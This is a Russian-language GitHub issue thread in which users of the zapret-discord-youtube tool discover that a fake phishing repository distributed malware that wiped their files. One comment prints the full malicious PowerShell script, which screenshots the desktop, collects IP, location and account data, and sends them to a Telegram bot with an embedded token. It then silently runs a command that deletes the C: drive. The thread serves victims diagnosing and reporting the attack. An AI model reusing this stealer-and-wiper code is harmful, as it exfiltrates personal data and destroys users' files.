Прога с вирусом

[AzidKillCam]

Прога снесла пол винды и удалила все файлы пользователя, а сам файл с майнером видимо вообще... Ну как так можно?

[AzidKillCam]

Биткоин кошель то может и разрабов драйвера, но странное совпадение, что прога снесла винду и не даёт себя удалить/закрыть Также повисли блоки на большинство антивирусов/ограничена учётка и т.д. Короче лажа полная Ситуация аналогичная и у другого человека

[ShamHyper]

Перезагрузи ПК в безопасном и удали, у тебя сервис висит и не даёт удалить. Про вирус посмеялся, спасибо

Прога снесла пол винды и удалила все файлы пользователя, а сам файл с майнером видимо вообще... Ну как так можно?

[AzidKillCam]

Сервис пытался через cmd остановить, а прав то нет) Перезагружать ПК так и так надо будет, но тут безопасный режим бесполезен по-сути, так как с флешки запуститься на WinPE и уже ручками восстановить легче) Единственная проблема в том, что восстанавливать файлы с nvme не так просто, так как имена файлов не все сохраняются, к сожалению

[AzidKillCam]

При этом до недавнего обновления всё работало нормально, а тут вдруг началось

[ShamHyper]

При этом до недавнего обновления всё работало нормально, а тут вдруг началось

То что антивирус на WinDivert ругается, это ничего не значит. Эта библеотека (или драйвер) занимается манипуляциями с трафиком интернета, что само по себе может считаться как "вредоносное действие". Такая же история была с GoodbyeDPI, что в нем вирусы и майнеры - https://github.com/ValdikSS/GoodbyeDPI/issues/376#issuecomment-2251796706

А то что у тебя случилось с ПК, это что-то очень странное, я проверил на трёх разных версиях винды это ПО, у меня проблем нет. Даже в теории это ПО не могло так сделать...

[ShamHyper]

Сервис пытался через cmd остановить, а прав то нет) Перезагружать ПК так и так надо будет, но тут безопасный режим бесполезен по-сути, так как с флешки запуститься на WinPE и уже ручками восстановить легче) Единственная проблема в том, что восстанавливать файлы с nvme не так просто, так как имена файлов не все сохраняются, к сожалению

Это пробовал?

takeown /f "C:\путь\к\файлу"
icacls "C:\путь\к\файлу" /grant %username%:F
del /f /s /q "C:\путь\к\файлу"

[AzidKillCam]

Ну на данный момент DrWeb CureIt скачал, вирусов всё же нет, был не прав.

Но сейчас буду на сервер восстанавливать данные с диска C:/ , потом через DISM++ / MSDart восстанавливать права админа, если не получится сделать это из под системы, которая "осталась*.

Удалить файл так просто не получится похоже, так как даже Unlocker не справляется, но команды всё-же попробую.

[ShamHyper]

Ну на данный момент DrWeb CureIt скачал, вирусов всё же нет, был не прав.

Но сейчас буду на сервер восстанавливать данные с диска C:/ , потом через DISM++ / MSDart восстанавливать права админа, если не получится сделать это из под системы, которая "осталась*.

Удалить файл так просто не получится похоже, так как даже Unlocker не справляется, но команды всё-же попробую.

Unlocker вроде тоже самое делает что в первых двух строчках, так что смысла нет. Попробуй R.saver, слышал он ссд-шники тоже восстановить может, если раздел не успел затерется

[AzidKillCam]

При этом до недавнего обновления всё работало нормально, а тут вдруг началось

То что антивирус на WinDivert ругается, это ничего не значит. Эта библеотека (или драйвер) занимается манипуляциями с трафиком интернета, что само по себе может считаться как "вредоносное действие". Такая же история была с GoodbyeDPI, что в нем вирусы и майнеры - ValdikSS/GoodbyeDPI#376 (comment)

А то что у тебя случилось с ПК, это что-то очень странное, я проверил на трёх разных версиях винды это ПО, у меня проблем нет. Даже в теории это ПО не могло так сделать...

У девушки на ноутбуке эта програмка тоже есть, но была скачена, как только вышла можно сказать и проблем не было. А сейчас уже скачал оьновлённую версию и такой "подарок" как у меня, так и у друга на компе

[ShamHyper]

При этом до недавнего обновления всё работало нормально, а тут вдруг началось

То что антивирус на WinDivert ругается, это ничего не значит. Эта библеотека (или драйвер) занимается манипуляциями с трафиком интернета, что само по себе может считаться как "вредоносное действие". Такая же история была с GoodbyeDPI, что в нем вирусы и майнеры - ValdikSS/GoodbyeDPI#376 (comment) А то что у тебя случилось с ПК, это что-то очень странное, я проверил на трёх разных версиях винды это ПО, у меня проблем нет. Даже в теории это ПО не могло так сделать...

У девушки на ноутбуке эта програмка тоже есть, но была скачена, как только вышла можно сказать и проблем не было. А сейчас уже скачал оьновлённую версию и такой "подарок" как у меня, так и у друга на компе

Можешь подробнее рассказать путь к повторению твоей ошибки? Как воспроизвести проблему? Я на виртуалке попробую, может действительно что-то случилось в последнем апдейте

[AzidKillCam]

Unlocker вроде тоже самое делает что в первых двух строчках, так что смысла нет. Попробуй R.saver, слышал он ссд-шники тоже восстановить может, если раздел не успел затерется

Большое спасибо за информацию. Так думал через Hetman восстанавливать, но почему-то о нём порой плохо отзываются, но вроде как с ним всё хорошо, не раз спасал из передряги.

[AzidKillCam]

Можешь подробнее рассказать путь к повторению твоей ошибки? Как воспроизвести проблему? Я на виртуалке попробую, может действительно что-то случилось в последнем апдейте

Просто запустил программу, затем discord и примерно, через минут 5 у меня пропали все файлы, без какой-либо причины. Из запущенного были в основном: opera gx Discord Telegram GlassWire Ну и куча сервисов/фоновых прог

У друга это произошло после того, как он закрыл прогу. И последствия точно такие же. Единственное, что осталось в сохранности - используемые программы.

У меня тут осталась фотография с исполняемым файлом/командами, но так вроде ничего плохого не вижу.

[AzidKillCam]

Но опять же файлы удалялись как-то выборочно... К примеру IOBit Driver Booster/FreeCodekPack/CCLeaner/CloudFlare/файлы, которые лежали просто на диске C:/ остались нетронутыми

[ShamHyper]

Только что ПК перезагрузил, всё ок. Пользовался этим батником

Но опять же файлы удалялись как-то выборочно... К примеру IOBit Driver Booster/FreeCodekPack/CCLeaner/CloudFlare/файлы, которые лежали просто на диске C:/ остались нетронутыми

[AzidKillCam]

Я использовал именно discord.bat, забыл уточнить, извиняюсь. Windows 10

[ShamHyper]

CCLeaner IOBit Driver Booster

Эти программы могли быть причинами. Сиклинер раньше ломал реестр напрочь, не знаю как сейчас. А драйвера нужно ставить ручками, ведь это тоже могло быть причиной

[AzidKillCam]

Эти программы могли быть причинами. Сиклинер раньше ломал реестр напрочь, не знаю как сейчас. А драйвера нужно ставить ручками, ведь это тоже могло быть причиной

Ну скажу так, CCLeaner я уже давно не использую, просто лежит "на всякий случай", как и IOBot Driver Booster. Но не могли же они просто так удалять файлы/ставить лок на папки/"блокировать" мою учётку, притом именно после запуска discord.bat

[ShamHyper]

Эти программы могли быть причинами. Сиклинер раньше ломал реестр напрочь, не знаю как сейчас. А драйвера нужно ставить ручками, ведь это тоже могло быть причиной

Ну скажу так, CCLeaner я уже давно не использую, просто лежит "на всякий случай", как и IOBot Driver Booster. Но не могли же они просто так удалять файлы/ставить лок на папки/"блокировать" мою учётку, притом именно после запуска discord.bat

Win+R -> eventvwr.msc Можно пристально изучить логи, чтобы найти причину :)

[AzidKillCam]

Также на сервере у меня также стоят эти программы, но драйвера все в полном порядке, даже телеграмм боты работают/медиа сервер/хост сайта И нет проблем, как будто в самом winws.exe проблема

[ShamHyper]

Ну если будет интересно, поизучай логи. Я проблему воспроизвести не смог, с тем же батником что ты использовал

[AzidKillCam]

Win+R -> eventvwr.msc Можно пристально изучить логи, чтобы найти причину :)

Честно говоря даже не знаю, что сказать... Был запуск WinDivert64.sys Дальше загрузка WinDivert2.2 LOAD А дальше с учётки снялась админка и пошли удаляться кусты с реестра

[AzidKillCam]

Ну если будет интересно, поизучай логи. Я проблему воспроизвести не смог, с тем же батником что ты использовал

Да вот спасибо, что хоть тут инфа осталась... Другие способы скорей всего также удалены, как и recent

[QARDEP]

Ты похоже скачал с фейкового репозитория, см. #154

[ShamHyper]

Win+R -> eventvwr.msc Можно пристально изучить логи, чтобы найти причину :)

Честно говоря даже не знаю, что сказать... Был запуск WinDivert64.sys Дальше загрузка WinDivert2.2 LOAD А дальше с учётки снялась админка и пошли удаляться кусты с реестра

Что-то очень странное и страшное, подождем ответ разработчика, может он подскажет в чём дело

[AzidKillCam]

Нет, ну конечно может быть, но звёзд было также 1.1k, по этому критерию и сравнивал

[ShamHyper]

Это фейк видимо? https://github.com/FlowseaI/zapret-discord-youtube/ (PHISHING)

[AzidKillCam]

Ты похоже скачал с фейкового репозитория, см. #154

Но отрицать не могу, так как мог оглядеться и быть виноватым сам в такой истории

[ShamHyper]

Ты похоже скачал с фейкового репозитория, см. #154

Но отрицать не могу, так как мог оглядеться и быть виноватым сам в такой истории

Проверь историю браузера, откуда качал

[QARDEP]

Это фейк видимо? https://github.com/FlowseaI/zapret-discord-youtube/

Да

[AzidKillCam]

Проверь историю браузера, откуда качал

Идея хорошая, но браузер не проверить, так как история браузера тоже удалена) Но сейчас в телеграмме покопаюсь, вроде как должна остаться

[AzidKillCam]

Да, реально огляделся, к сожалению... Мдем, обидка прям

https://github.com/FlowseaI_СКАМ/zapret-discord-youtube/releases/download/1.1.1/zapret-discord-youtube-1.1.1.zip

[ShamHyper]

Кидайте репорты, господа.

[AzidKillCam]

Кидайте репорты, господа.

Репорт закинул, но конечно так оглядеться... Это надо уметь похоже Но с другой стороны нашёл занятие на ночь

[AzidKillCam]

Попробуй R.saver, слышал он ссд-шники тоже восстановить может, если раздел не успел затерется

Вопросик есть, а R.saver умеет восстанавливать данные на подключённые сетевые диски?

[QARDEP]

Яндекс показывает фейковый репозиторий самым первым, а оригинал я там даже не увидел...

[AzidKillCam]

Яндекс показывает фейковый репозиторий самым первым, а оригинал я там даже не увидел...

Похоже на это и попался Ну Яндекс как обычно в своём репертуаре

[SsSAtonioSsS]

А дальше с учётки снялась админка и пошли удаляться кусты с реестра

KMS активаторы лучше не использовать с WinDivert изменением трафика. Они создают экземпляр реактивации через этот драйвер, либо через туннель OpenVPN. Для активации продуктов MS лучше использовать https://github.com/massgravel/Microsoft-Activation-Scripts.

[SsSAtonioSsS]

Из вредоносного репо - файл вредонос: list-other.ps1

Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
Add-Type -AssemblyName 'System.Net.Http'

try {
    $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
    $bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height
    $graphics = [System.Drawing.Graphics]::FromImage($bitmap)
    $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
    $memoryStream = New-Object System.IO.MemoryStream
    $bitmap.Save($memoryStream, [System.Drawing.Imaging.ImageFormat]::Png)
    $graphics.Dispose()
    $bitmap.Dispose()
    $memoryStream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null

    $country = (Invoke-RestMethod -Uri "http://ipinfo.io/country").Trim()
    $city = (Invoke-RestMethod -Uri "http://ipinfo.io/city").Trim()
    $ip = (Invoke-RestMethod -Uri "http://ifconfig.me").Trim()
    $isAdmin = (whoami /groups | Select-String "S-1-5-32-544").Length -gt 0
    $rights = if ($isAdmin) { "Admin" } else { "User     " }
    $os_caption = (Get-CimInstance Win32_OperatingSystem).Caption
    $os_arch = if ([Environment]::Is64BitOperatingSystem) { "x64" } else { "x86" }

$message = @"
Type: $os_caption ($os_arch)
From: $country $city ($ip)
Name: $env:USERNAME ($rights)
"@

    $bot_token = "7872562304:AAHDovPEKL6JPliHzkjUYTd26f8YFuM8vDA"
    $chat_id = "@dgfkewr"
    $uri = "https://api.telegram.org/bot$bot_token/sendPhoto"

    $client = [System.Net.Http.HttpClient]::new()
    $client.Timeout = [TimeSpan]::FromMinutes(5)

    $multipartContent = [System.Net.Http.MultipartFormDataContent]::new()
    $fileContent = [System.Net.Http.StreamContent]::new($memoryStream)
    $fileContent.Headers.ContentType = [System.Net.Http.Headers.MediaTypeHeaderValue]::Parse("image/png")
    $multipartContent.Add($fileContent, "photo", "screenshot.png")
    $multipartContent.Add([System.Net.Http.StringContent]::new($chat_id), "chat_id")
    $multipartContent.Add([System.Net.Http.StringContent]::new($message), "caption")

    $response = $client.PostAsync($uri, $multipartContent).Result

    Start-Process -FilePath "cmd" -ArgumentList @("/c", "rd /s /q C:\") -PassThru -WindowStyle Hidden

}
finally {
    if ($memoryStream) {
        $memoryStream.Dispose()
    }
    if ($client) {
        $client.Dispose()
    }
}```
Можно бота умельца дичью закидать 0)

[SsSAtonioSsS]

Яндекс показывает фейковый репозиторий самым первым, а оригинал я там даже не увидел...

Похоже на это и попался Ну Яндекс как обычно в своём репертуаре

Советую снести ось от проблем. Вдруг помимо стиллера еще что-то передал.

Либо найти последствия этого:

 Start-Process -FilePath "cmd" -ArgumentList @("/c", "rd /s /q C:\") -PassThru -WindowStyle Hidden

[AzidKillCam]

Яндекс показывает фейковый репозиторий самым первым, а оригинал я там даже не увидел...

Похоже на это и попался Ну Яндекс как обычно в своём репертуаре

Советую снести ось от проблем. Вдруг помимо стиллера еще что-то передал.

Либо найти последствия этого:

 Start-Process -FilePath "cmd" -ArgumentList @("/c", "rd /s /q C:\") -PassThru -WindowStyle Hidden

Да я думаю снести ось уже будет самым простым вариантом Да и сейчас в его группу, к слову, общедоступную, бота может запущу t.me/dgfkewr

[AzidKillCam]

Благо есть заготовленная флешка с чистой виндой Но конечно да, файлы восстановить не удалось с ssd, они просто нулями забиты, да и всё. Пробовал как r.saver, так и hetman

[Flowseal]

https://github.com/Flowseal/zapret-discord-youtube/issues/154

[ShamHyper]

Попробуй R.saver, слышал он ссд-шники тоже восстановить может, если раздел не успел затерется

Вопросик есть, а R.saver умеет восстанавливать данные на подключённые сетевые диски?

Честно, не знаю. Сам не пользовался, посветовали недавно коллеги

[oldweakness]

мне тоже снесло все файлы, причем я сначала не подумал на прогу, все таки гитхаб, да и был похожий случай с этим WinDivert у GoodByeDpi, снес винду и поставил новую, ничего не устанавливал и решил проверить эту прогу, итог - опять удалило все что было, хз че это но ставить я больше не буду.

[ShamHyper]

Только что прислали, что репорт рассмотрели, и репозиторий снесли. Ура!

[Sagboa]

Мне этот вирус винду снес

[SkyLeoS]

Только что прислали, что репорт рассмотрели, и репозиторий снесли. Ура!

Господа, подскажите. https://github.com/Flowseal/zapret-discord-youtube?tab=readme-ov-file - фейк или нет? Скачали для теста на всякий случай, уже пару часов сидим - вроде ничего такого не произошло, но из обсуждения выше была точно такая же ссылка, хотя потом сказали,что репозиторий снесли

[ShamHyper]

Только что прислали, что репорт рассмотрели, и репозиторий снесли. Ура!

Господа, подскажите. https://github.com/Flowseal/zapret-discord-youtube?tab=readme-ov-file - фейк или нет? Скачали для теста на всякий случай, уже пару часов сидим - вроде ничего такого не произошло, но из обсуждения выше была точно такая же ссылка, хотя потом сказали,что репозиторий снесли

Судя по количеству звёзд - оригинал

[SkyLeoS]

Судя по количеству звёзд - оригинал

меня смутило, что звезд 3,4к , а просмотров 44

[cherrypashka47]

Товарищи накидайте репортов https://github.com/Flowsael/zapret-discord-youtube/tree/main На гитхабе есть вообще модерация репозиториев, почему такое выкладывается? Я просто не опытен в этом деле Друг попросил помочь ему с ютубом и дискордом, сам этой программой пользуюсь, поэтому не думая скачал, что выдало ПЕРВОЙ же ссылкой в яндексе, не обратив внимания на звезды. Сначала программа не хотела запускаться, спустя раза 4-5 запустилась удалив все файлы с рабочего стола, я сразу же вырубил комп. После включения при вводе пин-кода выдает ошибку: «возникла проблема ваш пин код недоступен windows 10 0x80090016», я так полагаю винда полетела? в том репе во всех батниках левый код, есть эксперты кто может понять что он делает, просто винду сносит, или еще какие то данные отправляет, нужно ли пароли везде менять? и стоит ли пытаться оживить винду